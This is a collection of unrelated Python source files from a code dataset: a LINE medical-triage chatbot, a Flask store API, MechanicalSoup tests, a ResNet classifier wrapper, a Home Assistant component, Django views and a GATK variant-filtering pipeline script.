os.getenv('LINE_CHANNEL_TOKEN')\n\nif CHANNEL_SECRET is None:\n print(\"LINE_CHANNEL_SECRET may be undefined.\")\n sys.exit(1)\nif CHANNEL_TOKEN is None:\n print(\"LINE_CHANNEL_TOKEN may be undefined\")\n sys.exit(1)\n\nline_bot_api = LineBotApi(CHANNEL_TOKEN)\nhandler = WebhookHandler(CHANNEL_SECRET)\n\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n print(\"Invalid signature. 
Please check your channel access token/channel secret.\")\n        abort(400)\n\n    return 'OK'\n\n\nSTATE = {}\nDEPARTMENT = {}\n# state: 0(init), 1(diagnosis), 2(hospital), 3(covid-19), 4(knowledge), 5(knowledge_disease)\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n    global STATE\n    user = event.source.user_id\n    if user not in STATE:\n        STATE[user] = 0\n    message = event.message.text\n    if message == \"back\":\n        STATE[user] = 0\n        ret_message = TextSendMessage(text=\"請問要提供您什麼服務呢\")\n    elif message == \"初步診斷\" and STATE[user] == 0:\n        msg = \"請簡述您的症狀\"\n        STATE[user] = 1\n        ret_message = TextSendMessage(text=msg)\n\n    elif STATE[user] == 1 and (\"胸悶\" in message) and (\"疲累\" in message):\n        msg = \"初步分析結果:\\n心臟、肺臟、其他\\n\\n建議掛科:\\n心臟科、胸腔內科\\n\\n可能病因:\\n感染\\n\\n建議:\\n若為心臟方面疾病,需盡快就醫檢查\"\n        STATE[user] = 0\n        ret_message = TextSendMessage(\n            text=msg,\n            quick_reply=QuickReply(\n                items=[\n                    QuickReplyButton(\n                        action=MessageAction(label=\"相關疾病查詢\", text=\"相關疾病查詢\")\n                    ),\n                    QuickReplyButton(\n                        action=MessageAction(label=\"查詢附近的內科醫院\", text=\"查詢附近的內科醫院\")\n                    ),\n                    QuickReplyButton(\n                        action=MessageAction(label=\"其他服務\", text=\"其他服務\")\n                    )\n                ]))\n    elif STATE[user] == 1 and ((\"呼吸困難\" in message) or (\"嘨喘\" in message)):\n        STATE[user] = 0\n        msg = \"初步分析結果:\\n氣管阻塞、氣喘、慢性阻塞性肺病(COPD)、肺栓塞\\n近期covid19疫情嚴重,若仍有發燒、咳嗽等症狀同時出現,可能為新冠肺炎之感染!\\n\\n建議掛科:\\n胸腔科、感染科\\nCOVID-19患者請前往急診篩檢\\n\\n可能病因:\\n肺部感染、心衰竭\"\n        ret_message = TextSendMessage(\n            text=msg,\n            quick_reply=QuickReply(\n                items=[\n                    QuickReplyButton(\n                        action=URIAction(label='Covid19篩檢站', uri='https://antiflu.cdc.gov.tw/ExaminationCounter')\n                    )\n                ]))\n    elif STATE[user] == 1:\n        msg = \"Kompanion 暫時還診斷不出來您的病因,請尋找專業醫生協助,保重身體喔!!\"\n        ret_message = TextSendMessage(text=msg)\n        STATE[user] = 0\n\n    elif STATE[user] == 0 and message == \"醫療小知識\":\n        STATE[user] = 4\n        time.sleep(2)\n        msg = \"請問要詢問那一科呢?\"\n        qr = [QuickReplyButton(action=MessageAction(label=department, text=department)) for department in DEPARTMENTS]\n        ret_message = TextSendMessage(\n            text=msg,\n            quick_reply=QuickReply(items=qr)\n        )\n    \n    elif STATE[user] == 4:\n        STATE[user] = 5\n        msg = f\"請問想了解{message}的什麼疾病呢?\"\n        if message == \"心臟科\":\n            qr = [QuickReplyButton(action=MessageAction(label=department, text=department)) for department in [\"心肌炎\",\"高血壓心臟病\",\"風濕性心臟病\",\"缺血性心臟病\",\"瓣膜性心臟病\",\"感染性心內膜炎\",\"心包膜疾病\",\"心律不整\",\"心臟腫瘤\",\"冠心病\",\"主動脈瘤破裂\",\"心肌梗塞\"]]\n            ret_message = TextSendMessage(text=msg,quick_reply=QuickReply(items=qr))\n        elif message == \"胸腔內科\":\n            qr = [QuickReplyButton(action=MessageAction(label=department, text=department)) for department in [\"肺炎\",\"肺栓塞\",\"心因性肺水腫\",\"氣胸\",\"氣喘\",\"肺癌\",\"慢性阻塞性肺病(COPD)\",\"慢性支氣管炎\",\"急性支氣管炎\",\"支氣管擴張症\",\"支氣管癌\"]]\n            ret_message = TextSendMessage(text=msg,quick_reply=QuickReply(items=qr))\n        else:\n            ret_message = TextSendMessage(text=msg)\n        time.sleep(2)\n\n    elif STATE[user] == 5 and message == \"心肌炎\":\n        STATE[user] = 0\n        msg = \"提供以下資訊給您參考:\\nhttps://wwwv.tsgh.ndmctsgh.edu.tw/unit/10012/12856\"\n        ret_message = TextSendMessage(text=msg)\n\n    elif STATE[user] == 5:\n        STATE[user] = 0\n\n        msg = \"提供以下資訊給您參考:\\nhttps://wwwv.tsgh.ndmctsgh.edu.tw/unit/10012/12856\"\n        ret_message = TextSendMessage(text=msg)\n\n    elif STATE[user] == 0 and message == \"查詢附近的採檢站\":\n        STATE[user] = 3\n        msg = \"請提供您的位置\"\n        ret_message = TextSendMessage(\n            text=msg,\n            quick_reply=QuickReply(\n                items=[\n                    QuickReplyButton( \n                        action=LocationAction(label=\"查詢附近的採檢站\")\n                    ),\n                    QuickReplyButton(\n                        action=MessageAction(label=\"其他服務\", text=\"其他服務\")\n                    )\n                ]))\n\n    elif STATE[user] == 0 and 
message == \"查詢附近的醫院\":\n STATE[user] = 2\n time.sleep(2)\n qr = [QuickReplyButton(action=MessageAction(label=department, text=department)) for department in DEPARTMENTS]\n \n ret_message = TextSendMessage(\n text=\"要看哪一科呢?\",\n quick_reply=QuickReply(items=qr))\n\n elif STATE[user] == 2 or message == \"查詢附近的內科醫院\":\n msg = \"請提供您的位置\"\n DEPARTMENT[user] = message\n ret_message = TextSendMessage(\n text=msg,\n quick_reply=QuickReply(\n items=[\n QuickReplyButton( \n action=LocationAction(label=\"查詢附近的醫院\")\n ),\n QuickReplyButton(\n action=MessageAction(label=\"其他服務\", text=\"其他服務\")\n )\n ]))\n\n else:\n STATE[user] = 0\n ret_message = TextSendMessage(text='你好!!我是 Kompanion,您的智慧醫療小助手!請問我能夠幫您什麼呢?')\n\n line_bot_api.reply_message(event.reply_token, ret_message)\n\n@handler.add(MessageEvent, message=LocationMessage)\ndef handle_location_message(event):\n\n global STATE\n global DEPARTMENT\n user = event.source.user_id\n LATITUDE = event.message.latitude\n LONGITUDE = event.message.longitude\n if STATE[user] == 3:\n pcr_name = get_nearby_PCR((LATITUDE, LONGITUDE))\n msg = f\"離您最近的採檢站為:\\n{pcr_name}\\n\\n打開google map以查詢位置:\\nhttps://www.google.com.tw/maps/search/{pcr_name}\"\n ret_message = TextSendMessage(text=msg)\n elif STATE[user] == 2:\n # get_hospital_by_department DEPARTMENT[user]\n test_flex = json.load(open(\"./flex/hospital.json\", \"r\"))\n ret_message = FlexSendMessage(alt_text='hospital', contents=test_flex)\n else:\n ret_message = TextSendMessage(text=str(STATE[user]))\n \n STATE[user] = 0\n line_bot_api.reply_message(event.reply_token, ret_message)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000, debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"244137461","text":"import sys\nimport os\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom PyQt5.QtCore import QUrl\n\nclass TabletFrame(QMainWindow):\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.title = 'Figaro Tablet Control'\n\t\tself.setWindowTitle(self.title)\n\t\tself.setGeometry(200,200,800,600)\n\t\thtml_view = HTMLVis(self)\n\t\tself.show()\n\nclass HTMLVis(QWebEngineView):\n\n\tdef __init__(self, parent):\n\t\tsuper().__init__(parent)\n\t\tself.cwd = os.getcwd()\n\t\tself.setGeometry(0,0,800,600)\n\t\turl = QUrl.fromLocalFile(\"{}/index.html\".format(self.cwd))\n\t\tself.load(url)","sub_path":"server/server/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"387438305","text":"class Frequency:\n def __init__(self, arr, item):\n self.arr = arr\n self.item = item\n\n def get_frequency(self):\n count = 0\n\n if item not in arr:\n return count\n else:\n for i in self.arr:\n if i == self.item:\n count += 1\n\n return count\n\nif __name__ == \"__main__\":\n arr = [x for x in input(\"Enter array elements space seperated\").split()]\n item = input(\"Enter the item whose frequency you want to know\")\n\n f1 = Frequency(arr, item)\n print(f1.get_frequency())\n","sub_path":"phase1/freqArrayEle.py","file_name":"freqArrayEle.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"562268404","text":"import mechanicalsoup\nimport sys\nimport re\nfrom bs4 import BeautifulSoup\nfrom 
test_form import setup_mock_browser\nimport pytest\n\ndef test_submit_online():\n    \"\"\"Complete and submit the pizza form at http://httpbin.org/forms/post \"\"\"\n    browser = mechanicalsoup.StatefulBrowser()\n    browser.set_user_agent('testing https://github.com/hickford/MechanicalSoup')\n    browser.open(\"http://httpbin.org/\")\n    for link in browser.links():\n        if link[\"href\"] == \"/\":\n            browser.follow_link(link)\n            break\n    browser.follow_link(\"forms/post\")\n    assert browser.get_url() == \"http://httpbin.org/forms/post\"\n    browser.select_form(\"form\")\n    browser[\"custname\"] = \"Customer Name Here\"\n    browser[\"size\"] = \"medium\"\n    browser[\"topping\"] = (\"cheese\")\n    browser[\"comments\"] = \"Some comment here\"\n    browser.get_current_form().set(\"nosuchfield\", \"new value\", True)\n    response = browser.submit_selected()\n    json = response.json()\n    data = json[\"form\"]\n    assert data[\"custname\"] == \"Customer Name Here\"\n    assert data[\"custtel\"] == \"\"  # web browser submits \"\" for input left blank\n    assert data[\"size\"] == \"medium\"\n    assert data[\"topping\"] == \"cheese\"\n    assert data[\"comments\"] == \"Some comment here\"\n    assert data[\"nosuchfield\"] == \"new value\"\n\n    assert (json[\"headers\"][\"User-Agent\"] ==\n            'testing https://github.com/hickford/MechanicalSoup')\n    # Ensure we haven't blown away any regular headers\n    assert set(('Content-Length', 'Host', 'Content-Type', 'Connection', 'Accept',\n                'User-Agent', 'Accept-Encoding')).issubset(json[\"headers\"].keys())\n\n\ndef test_no_404():\n    browser = mechanicalsoup.StatefulBrowser()\n    resp = browser.open(\"http://httpbin.org/nosuchpage\")\n    assert resp.status_code == 404\n\ndef test_404():\n    browser = mechanicalsoup.StatefulBrowser(raise_on_404=True)\n    with pytest.raises(mechanicalsoup.LinkNotFoundError) as context:\n        resp = browser.open(\"http://httpbin.org/nosuchpage\")\n    resp = browser.open(\"http://httpbin.org/\")\n    assert resp.status_code == 200\n\ndef test_user_agent():\n    browser = mechanicalsoup.StatefulBrowser(user_agent='007')\n    resp = browser.open(\"http://httpbin.org/user-agent\")\n    assert resp.json() == {'user-agent': '007'}\n\ndef test_open_relative():\n    # Open an arbitrary httpbin page to set the current URL\n    browser = mechanicalsoup.StatefulBrowser()\n    browser.open(\"http://httpbin.org/html\")\n\n    # Open a relative page and make sure remote host and browser agree on URL\n    resp = browser.open_relative(\"/get\")\n    assert resp.json()['url'] == \"http://httpbin.org/get\"\n    assert browser.get_url() == \"http://httpbin.org/get\"\n\n    # Test passing additional kwargs to the session\n    resp = browser.open_relative(\"/basic-auth/me/123\", auth=('me', '123'))\n    assert browser.get_url() == \"http://httpbin.org/basic-auth/me/123\"\n    assert resp.json() == {\"authenticated\": True, \"user\": \"me\"}\n\ndef test_links():\n    browser = mechanicalsoup.StatefulBrowser()\n    html = '''<a href=\"/blue\" class=\"bluelink\" id=\"blue_link\">A Blue Link</a>\n              <a href=\"/red\" class=\"redlink\" id=\"red_link\">A Red Link</a>'''\n    expected = [BeautifulSoup(html).a]\n    browser.open_fake_page(html)\n\n    # Test StatefulBrowser.links url_regex argument\n    assert browser.links(url_regex=\"bl\") == expected\n    assert browser.links(url_regex=\"bluish\") == []\n\n    # Test StatefulBrowser.links link_text argument\n    assert browser.links(link_text=\"A Blue Link\") == expected\n    assert browser.links(link_text=\"Blue\") == []\n\n    # Test StatefulBrowser.links kwargs passed to BeautifulSoup.find_all\n    assert browser.links(string=re.compile('Blue')) == expected\n    assert browser.links(class_=\"bluelink\") == expected\n    assert browser.links(id=\"blue_link\") == 
expected\n    assert browser.links(id=\"blue\") == []\n\n    # Test returning a non-singleton\n    two_links = browser.links(id=re.compile('_link'))\n    assert len(two_links) == 2\n    assert two_links == BeautifulSoup(html).find_all('a')\n\n@pytest.mark.parametrize(\"expected_post\", [\n    pytest.param(\n        [\n            ('comment', 'Selecting an input submit'),\n            ('diff', 'Review Changes'),\n            ('text', 'Setting some text!')\n        ], id='input'),\n    pytest.param(\n        [\n            ('comment', 'Selecting a button submit'),\n            ('cancel', 'Cancel'),\n            ('text', '= Heading =\\n\\nNew page here!\\n')\n        ], id='button'),\n])\ndef test_submit_btnName(expected_post):\n    '''Tests that the btnName argument chooses the submit button.'''\n    browser, url = setup_mock_browser(expected_post=expected_post)\n    browser.open(url)\n    form = browser.select_form('#choose-submit-form')\n    browser['text'] = expected_post[2][1]\n    browser['comment'] = expected_post[0][1]\n    res = browser.submit_selected(btnName = expected_post[1][0])\n    assert(res.status_code == 200 and res.text == 'Success!')\n\ndef test_get_set_debug():\n    browser = mechanicalsoup.StatefulBrowser()\n    # Debug mode is off by default\n    assert(not browser.get_debug())\n    browser.set_debug(True)\n    assert(browser.get_debug())\n\ndef test_list_links(capsys):\n    # capsys is a pytest fixture that allows us to inspect the std{err,out}\n    browser = mechanicalsoup.StatefulBrowser()\n    links = '''\n    <a href=\"/link1\">Link #1</a>\n    <a href=\"/link2\">Link #2</a>\n'''\n    browser.open_fake_page('<html>{0}</html>'.format(links))\n    browser.list_links()\n    out, err = capsys.readouterr()\n    expected = 'Links in the current page:{0}'.format(links)\n    assert out == expected\n\nif __name__ == '__main__':\n    pytest.main(sys.argv)\n","sub_path":"tests/test_stateful_browser.py","file_name":"test_stateful_browser.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"564592001","text":"import torch\nfrom torchvision import models\nfrom torchvision import transforms\nfrom PIL import Image\n\n\nclass MyResnet():\n    def __init__(self, model_state_path: str, classes_names_path: str):\n        # load the model\n        self._model = models.resnet101(pretrained=False)\n        state_dict = torch.load(model_state_path)\n        self._model.load_state_dict(state_dict)\n        # put the network in eval mode\n        self._model.eval()\n        # create an image transform\n        self.transform = transforms.Compose([\n            transforms.Resize(256),\n            transforms.CenterCrop(224),\n            transforms.ToTensor(),\n            transforms.Normalize(\n                mean=[0.485, 0.456, 0.406],\n                std=[0.229, 0.224, 0.225]\n            )])\n        # load names of all classes\n        with open(classes_names_path) as f:\n            self.classes = [line.strip() for line in f.readlines()]\n\n    def predict(self, img: Image):\n        img_t = self.transform(img)\n        batch_t = torch.unsqueeze(img_t, 0)\n\n        # carry out model inference\n        out = self._model(batch_t)\n\n        _, index = torch.max(out, 1)\n        percentage = torch.nn.functional.softmax(out, dim=1)[0] * 100\n        return self.classes[index[0]], percentage[index[0]].item()\n\n# # Forth, print the top 5 classes predicted by the model\n# _, indices = torch.sort(out, descending=True)\n# percentage = torch.nn.functional.softmax(out, dim=1)[0] * 100\n# print([(classes[idx], percentage[idx].item()) for idx in indices[0][:5]])\n","sub_path":"v4-docker-w-minio/model/myresnet.py","file_name":"myresnet.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"88763701","text":"from abc import ABC, abstractmethod\r\nfrom typing import 
List\r\nfrom typing import Optional\r\nfrom copy import deepcopy\r\nimport re\r\n\r\n\r\nclass Product:\r\n def __init__(self, name: str, price: float):\r\n self.name = name\r\n self.price = price\r\n\r\n def __hash__(self):\r\n return hash((self.name, self.price))\r\n\r\n def __eq__(self, other):\r\n return self.name == other.name and self.price == other.price\r\n\r\n\r\nclass Server(ABC):\r\n n_max_returned_entries = 3\r\n\r\n @abstractmethod\r\n def __init__(self):\r\n super().__init__()\r\n\r\n @abstractmethod\r\n def get_entries(self, n_letters: Optional[int]) -> List[Product]:\r\n pass\r\n\r\n\r\nclass ListServer(Server):\r\n\r\n def __init__(self, productlist: List[Product]):\r\n super().__init__()\r\n self.products = deepcopy(productlist)\r\n\r\n def get_entries(self, n_letters: Optional[int] = None) -> List[Product]:\r\n if n_letters is None:\r\n n_letters = 1\r\n\r\n new_list = []\r\n\r\n for el in self.products:\r\n if re.match('^[a-zA-Z]{{{n}}}\\\\d{{2,3}}$'.format(n=n_letters), el.name):\r\n new_list.append(el)\r\n\r\n if len(new_list) <= self.n_max_returned_entries:\r\n second_list = sorted(new_list, key=lambda el: el.price)\r\n return second_list\r\n else:\r\n raise TooManyProductsFoundError\r\n\r\n\r\nclass MapServer(Server):\r\n def __init__(self, productlist: List[Product]):\r\n super().__init__()\r\n productdict = dict()\r\n for el in productlist:\r\n productdict[el.name] = el\r\n self.products = deepcopy(productdict)\r\n\r\n def get_entries(self, n_letters: Optional[int] = None) -> List[Product]:\r\n if n_letters is None:\r\n n_letters = 1\r\n\r\n new_list = []\r\n\r\n for el in self.products.values():\r\n if re.match('^[a-zA-Z]{{{n}}}\\\\d{{2,3}}$'.format(n=n_letters), el.name):\r\n new_list.append(el)\r\n\r\n if len(new_list) <= self.n_max_returned_entries:\r\n second_list = sorted(new_list, key=lambda el: el.price)\r\n return second_list\r\n else:\r\n raise TooManyProductsFoundError\r\n\r\n\r\nclass Client:\r\n\r\n def __init__(self, city_centre: Server):\r\n self.city_server = city_centre\r\n\r\n def get_total_price(self, n_letters: Optional[int]) -> Optional[float]:\r\n try:\r\n sum = 0\r\n koszyk = self.city_server.get_entries(n_letters)\r\n if len(koszyk) == 0:\r\n return None\r\n for el in koszyk:\r\n sum = sum + el.price\r\n return sum\r\n except TooManyProductsFoundError:\r\n return None\r\n\r\n\r\nclass ServerError(Exception):\r\n pass\r\n\r\n\r\nclass TooManyProductsFoundError(ServerError):\r\n pass\r\n\r\n","sub_path":"servers.py","file_name":"servers.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"354689762","text":"\n\ndata = [ ('A', 'D', 24),\n ('B', 'D', 24),\n ('C', 'H', 192),\n ('D', 'H', 160),\n ('E', 'H', 94),]\n\nfor item in data:\n gubun = item[1]\n amount = item[2]\n salary = 0\n if gubun == 'D':\n salary = amount * 8 * 7560\n else:\n salary = amount * 7560\n\n print(item[0], salary)","sub_path":"calc_salary.py","file_name":"calc_salary.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"138184089","text":"# 引入记录日志的库\nimport logging\nimport voluptuous as vol\nimport homeassistant.helpers.config_validation as cv\nfrom datetime import timedelta\n# track_time_interval是监听时间变化事件的一个函数\nfrom homeassistant.helpers.event import track_time_interval\n \nDOMAIN = \"hello_world\"\nENTITYID = DOMAIN + \".hello_world\"\n\n\n# 预定义配置文件中的key值\nCONF_NAME_TOBE_DISPLAYED 
= \"name_tobe_displayed\"\nCONF_SLOGON = \"slogon\"\n\n# 预定义缺省的配置值\nDEFAULT_SLOGON = \"积木构建智慧空间!\"\n\nCONF_STEP = \"step\"\nDEFAULT_STEP = 3\n\n# 定义时间间隔为3秒钟\nTIME_BETWEEN_UPDATES = timedelta(seconds=3)\n \n# 在python中,__name__代表模块名字\n_LOGGER = logging.getLogger(__name__)\n\n# 配置文件的样式\nCONFIG_SCHEMA = vol.Schema(\n {\n DOMAIN: vol.Schema(\n {\n # “name_tobe_displayed”在配置文件中是必须存在的(Required),否则报错,它的类型是字符串\n vol.Required(CONF_NAME_TOBE_DISPLAYED): cv.string,\n # “slogon”在配置文件中可以没有(Optional),如果没有缺省值为“积木构建智慧空间!”,它的类型是字符串\n vol.Optional(CONF_SLOGON, default=DEFAULT_SLOGON): cv.string,\n vol.Optional(CONF_STEP,default=DEFAULT_STEP): cv.positive_int,\n }),\n },\n extra=vol.ALLOW_EXTRA)\n\n\n \ndef setup(hass, config):\n\n \"\"\"配置文件加载后,setup被系统调用.\"\"\"\n # config[DOMAIN]代表这个域下的配置信息\n conf = config[DOMAIN]\n # 获得具体配置项信息\n friendly_name = conf.get(CONF_NAME_TOBE_DISPLAYED)\n slogon = conf.get(CONF_SLOGON)\n step = conf.get(CONF_STEP)\n\n _LOGGER.info(\"Get the configuration %s=%s; %s=%s\",\n CONF_NAME_TOBE_DISPLAYED, friendly_name,\n CONF_SLOGON, slogon)\n\n # 根据配置内容设置属性值\n attr = {\"icon\": \"mdi:yin-yang\",\n \"friendly_name\": friendly_name,\n \"slogon\": slogon,\n \"unit_of_measurement\": \"steps\"\n }\n hass.states.set(ENTITYID, '太棒了', attributes=attr)\n\n \n def change_state(call):\n \"\"\"change_state函数切换改变实体的状态.\"\"\"\n # 记录info级别的日志\n _LOGGER.info(\"hachina's change_state service is called.\")\n \n # 切换改变状态值\n if hass.states.get(ENTITYID).state == '太棒了':\n hass.states.set(ENTITYID, '真好', attributes=attr)\n else:\n hass.states.set(ENTITYID, '太棒了', attributes=attr)\n \n # 注册服务hachina.change_state\n hass.services.register(DOMAIN, 'change_state', change_state)\n \n\n\n # 构建类GrowingState\n GrowingState(hass, step, attr)\n\n return True\n\n\nclass GrowingState(object):\n \"\"\"定义一个类,此类中存储了状态与属性值,并定时更新状���.\"\"\"\n \n def __init__(self, hass, step, attr):\n \"\"\"GrwoingState类的初始化函数,参数为hass、step和attr.\"\"\"\n # 定义类中的一些数据\n self._hass = hass\n self._step = step\n self._attr = attr\n self._state = 0\n \n # 在类初始化的时候,设置初始状态\n self._hass.states.set(ENTITYID, self._state, attributes=self._attr)\n \n # 每隔一段时间,更新一下实体的状态\n track_time_interval(self._hass, self.update, TIME_BETWEEN_UPDATES)\n \n def update(self, now):\n \"\"\"在GrowingState类中定义函数update,更新状态.\"\"\"\n _LOGGER.info(\"GrowingState is updating…\")\n \n # 状态值每次增加step\n self._state = self._state + self._step\n \n # 设置新的状态值\n self._hass.states.set(ENTITYID, self._state, attributes=self._attr)\n","sub_path":"custom_components/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"415059083","text":"from django.shortcuts import render\nfrom django.views.generic.base import TemplateView\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse, Http404, HttpResponseRedirect\nfrom product.models import Category\nfrom blog.models import Post, Subscriber\n# Create your views here.\n\nclass HomePageView(TemplateView):\n\n template_name = \"home.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"categories\"] = Category.objects.all() \n context[\"posts\"] = Post.objects.filter(public=True).order_by('-created_at')[:3]\n return context\n\n\n@csrf_exempt\ndef subscribe_view(request):\n if request.method == \"POST\" and request.is_ajax():\n\n email = request.POST.get('email', None)\n if email:\n subscriber = 
Subscriber.objects.filter(email=email)\n            \n            if not subscriber.exists():\n                Subscriber.objects.create(email=email)\n            \n            elif Subscriber.objects.get(email=email).active == False:\n                Subscriber.objects.filter(email=email).update(active = True) \n\n            data = { 'registered': True }\n            \n            return JsonResponse(data)\n    raise Http404(\"Página não encontrada.\")","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"254247483","text":"from flask import Flask,jsonify,request\r\n\r\napp=Flask(__name__)\r\n\r\nstores=[\r\n{\r\n   \"name\":\"ram\",\r\n   \"items\":[{\r\n   \"name\":\"item\",\r\n   \"price\":12\r\n   }]\r\n}\r\n]\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n\treturn \"hello\"\r\n\r\n@app.route(\"/store\")\r\ndef get_stores():\r\n\treturn jsonify({'stores': stores})\r\n\r\n@app.route('/store',methods=['POST'])\r\ndef create_store():\r\n    request_data=request.get_json()\r\n    new_store={\r\n    \"name\":request_data[\"name\"],\r\n    \"items\":[]\r\n    }\r\n    stores.append(new_store)\r\n    return jsonify({'stores': stores})\r\n\r\n\r\n\r\n@app.route(\"/store/<string:name>\", methods=['DELETE'])\r\ndef delete_store(name):\r\n\tfor store in stores:\r\n\t\tif store[\"name\"]==name:\r\n\t\t\tstores.remove(store)\r\n\t\t\treturn \"done\"\r\n\treturn \"error\"\r\n\r\n@app.route(\"/store/<string:name>\", methods=['PUT'])\r\ndef put_store(name):\r\n\trequest_data=request.get_json()\r\n\tfor store in stores:\r\n\t\tif store[\"name\"]==name:\r\n\t\t\tstore.update({\"name\":request_data[\"name\"]})\r\n\t\t\treturn \"done\"\r\n\treturn \"Error\"\r\n\r\n\r\n\t\r\n\r\n\r\napp.run(port=5000)","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"613840184","text":"#Alan Pittman & Dionysios Grigoriadis\r\n\r\n#Program to genotype gVCF files in batches to join later for cohort (exome-wide studies etc.)\r\n\r\n#Step_by_step:\r\n#1)Combine gVCF files into a joint gVCF file,\r\n#2)Genotype joint gVCF file\r\n\r\n#Version 1.1\r\n# - Written in Python instead of bash\r\n# - Log files will be written in the output directories\r\n#################################################################################################################\r\nimport os\r\nimport sys\r\nimport subprocess\r\nimport csv\r\nfrom optparse import OptionParser\r\n\r\n#OUR RESOURCES:\r\nfrom dependencies import *\r\nfrom utils import *\r\n\r\n#USER INPUT\r\nparser = OptionParser()\r\nparser.add_option(\"-p\", \"--Project_name\", dest=\"projectname\",\r\n\t\t\t\t  help=\"The suffix of the joint vcf you want to filter\")\r\n#parser.add_option(\"-o\", \"--output\", dest=\"output\",\r\n#\t\t\t\t  help=\"suffix of the result files (e.g. 
comb for ./comb.g.vcf.gz\")\r\n\r\n(options, args) = parser.parse_args()\r\n\r\npname = options.projectname\r\n#gname = options.glocname\r\n#output = options.output\r\n\r\n\r\n#pname='postergaard_athos_and_25032019'\r\npname = pname.strip()\r\n\r\n##############################################################\r\n#Set-up working and output directories\r\ndirpath = os.getcwd()\r\ntemp_dir = dirpath+\"/tmp/\"+pname+\"/\"\r\ncohort_dir = dirpath+\"/Filtered_Joint_called_VCFs/\"\r\nout_dir = cohort_dir + pname + \"/\"\r\nvfilt_output = temp_dir+pname+\"_HF.vcf\"\r\nvrecal1_output = temp_dir+pname+\"_SNP.recal\"\r\nvsqr_output = temp_dir+pname+\"_HF_SNP.recal.snps.vcf\"\r\nvrecal2_output = temp_dir+pname+\"_INDEL.recal\"\r\nvsqr_final_output = out_dir+pname+\"_HF4_SNP.recal.snps.indel.vcf\"\r\nvsqr_final_annotated_output = out_dir+pname+\"_HF4_SNP.recal.snps.indel.dbSNP.vcf\"\r\n\r\n\r\nif not os.path.exists(temp_dir):\r\n os.makedirs(temp_dir)\r\n\r\n\r\nif not os.path.exists(cohort_dir):\r\n os.makedirs(cohort_dir)\r\n\r\n\r\n\r\nif not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n\r\n##############################################################\r\n##############################################################\r\n##RUNNING THE COMMANDS\r\n#Variant Filtration\r\nprint(\"\\n\")\r\nprint(\"VariantFiltration\")\r\ncomm = java+' -Xmx10g -jar '+gatk+' VariantFiltration -R '+BWAindex+\" -V \"+temp_dir+pname+\".vcf \"+'--genotype-filter-expression \"DP < 6\" ' \\\r\n '--genotype-filter-name \"LowDepth\" --genotype-filter-expression \"GQ < 20.0 && GQ > 0.0\" --genotype-filter-name \"LowGQ\" -O '+vfilt_output\r\nparallel_command([comm], 1, temp_dir+\"/\", 'VariantFiltration.log') #n=2\r\nprint(comm)\r\nprint(\"\\n\")\r\n\r\n#os.remove(temp_dir+'temp_vars.txt')\r\n\r\n#VariantRecalibrator\r\nprint(\"\\n\")\r\nprint(\"VariantRecalibrator\")\r\ncomm = java+' -Xmx10g -jar '+gatk+' VariantRecalibrator -R '+BWAindex+\" -V \"+vfilt_output+\" -tranche 100.0 -tranche 99.9 -tranche 99.5 \" \\\r\n \"-tranche 99.0 -tranche 90.0 -mode SNP --tranches-file \"+temp_dir+pname+\"_SNP.tranches --rscript-file \"+temp_dir+pname+\".plots.R \" \\\r\n \"--resource hapmap,known=false,training=true,truth=true,prior=15.0:\"+hapmap+\" --resource omni,known=false,training=true,truth=true,\" \\\r\n \"prior=12.0:\"+omni+\" --resource 1000G,known=false,training=true,truth=false,prior=10.0:\"+G1000+\" --resource dbsnp,known=true,training=\" \\\r\n \"false,truth=false,prior=2.0:\"+dbsnp+\" -an QD -an MQ -an MQRankSum -an ReadPosRankSum -an FS -an SOR --output \"+vrecal1_output\r\nparallel_command([comm], 1, temp_dir+\"/\", 'VariantRecalibrator.log') #n=2\r\n\r\n#os.remove(gvcf_output)\r\nprint(comm)\r\nprint(\"\\n\")\r\n\r\n#ApplyVQSR\r\nprint(\"\\n\")\r\nprint(\"ApplyVQSR\")\r\ncomm = java+' -Xmx10g -jar '+gatk+' ApplyVQSR -R '+BWAindex+\" -mode SNP --truth-sensitivity-filter-level 99.5 -V \"+vfilt_output+\" \" \\\r\n \"--tranches-file \"+temp_dir+pname+\"_SNP.tranches --recal-file \"+vrecal1_output+\" -O 